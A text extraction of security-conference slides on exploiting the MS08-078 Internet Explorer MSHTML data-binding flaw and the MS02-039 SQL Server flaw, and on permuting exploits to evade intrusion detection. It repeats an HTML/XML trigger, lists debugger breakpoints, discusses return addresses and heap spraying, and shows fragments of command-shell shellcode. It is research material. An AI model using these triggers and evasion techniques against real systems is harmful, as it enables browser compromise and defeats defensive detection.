  • 80. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 81. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 82. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::RemoveBinding DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 83. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 _MemFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 84. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 HeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 85. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlFreeHeap DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 86. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlpLowFragHeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 87. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplAry::Delete DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 88. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::Detach DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 89. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 90. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 91. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 92. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 93. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 94. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 95. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 96. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 97. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 98. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 99. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 100. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 101. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 102. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 103. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 104. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t 0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 105. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t DATAFLD 0a0a0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 106. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATAFLD 0x0a0a0a0a Exploitation shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 107. MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
  • 108. MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
  • 110. Approach Unconditional Vulnerability Complete (YES) Incomplete (NO) Vulnerable Documentation? Document Alternatives? Ecosystem Reverse Reversing? Alternatives? Alternatives Engineer Obfuscation Exploitation Arbitrary code Alternatives Detection Attack detection Alternatives? Permutation OP
  • 111. MS02-039 POPed • SQL Request: • JUMP: – CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and forward to REL8. • SQL INSTANCENAME: – There are 115 possible values to REL8. – ASCII hexa values from 0x01 to 0xff, except: – 115 permutations. 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c. – 24,000 permutations. • Writable address and memory alignment: – There are 26,758 new writable addresses within • Return address: SQLSORT.DLL (Microsoft SQL Server 2000 – Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable case the ESP register. addresses if do not mind making it hardcoded. – There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk. 2000 SP0/SP1/SP2). There are much more return – 26,758 permutations. addresses if do not mind making it hardcoded. – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment: Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff. and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities. 2007). – 29,210 permutations. – 4 permutations.
  • 114. MS08-078 POPed • CVE-2008-4844: “…crafted XML document • Data Consumer (HTML elements): containing nested <SPAN> elements”? I do not – According to MSDN (“Binding HTML think so… Elements to Data”) there are, at least, fifteen (15) bindable HTML elements • XML Data Island: available, but only five (5) elements are – There are two (2) options: using the useful. Dynamic HTML (DHTML) <XML> element – The HTML element is a key trigger, because within the HTML document or overloading it points to a dereferenced XML DSO, but the HTML <SCRIPT> element. it does not have to be the same HTML – Unfortunately, the HTML <SCRIPT> element to do so – it can be any mixed element is useless. HTML element. – But there are three (03) new alternatives to – 25 permutations. embedded a DSO. – 4 permutations. • Return address: – Uses “Heap Spray” technique, in this case • XML Data Source Object (DSO): the XML DSO handles the return address, and can use “.NET DLL” technique by Mark – Characters like “<” and “&” are illegal in Dowd and Alexander Sotirov (“How to <XML> element. To avoid errors <XML> Impress Girls with Browser Memory element can be defined as CDATA Protection Bypasses” – Black Hat USA, (Unparsed Character Data). But the <XML> 2008). element can be also defined as “&lt;” instead of “<”. – There are, at least, four (4) new possible return addresses. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations. – 4 permutations.
  • 116. Shellcode Regular Hadoken (波動拳) shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
  • 117. Shellcode Regular Hadoken (波動拳) shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
  • 118. Shellcode Shoryuken (昇龍拳) FPU GetPC shell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2. shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
  • 119. Shellcode Shoryuken (昇龍拳) FPU GetPC shell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2. shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
  • 121. What demo? NO DEMONSTRATION But you can test by yourselves!!!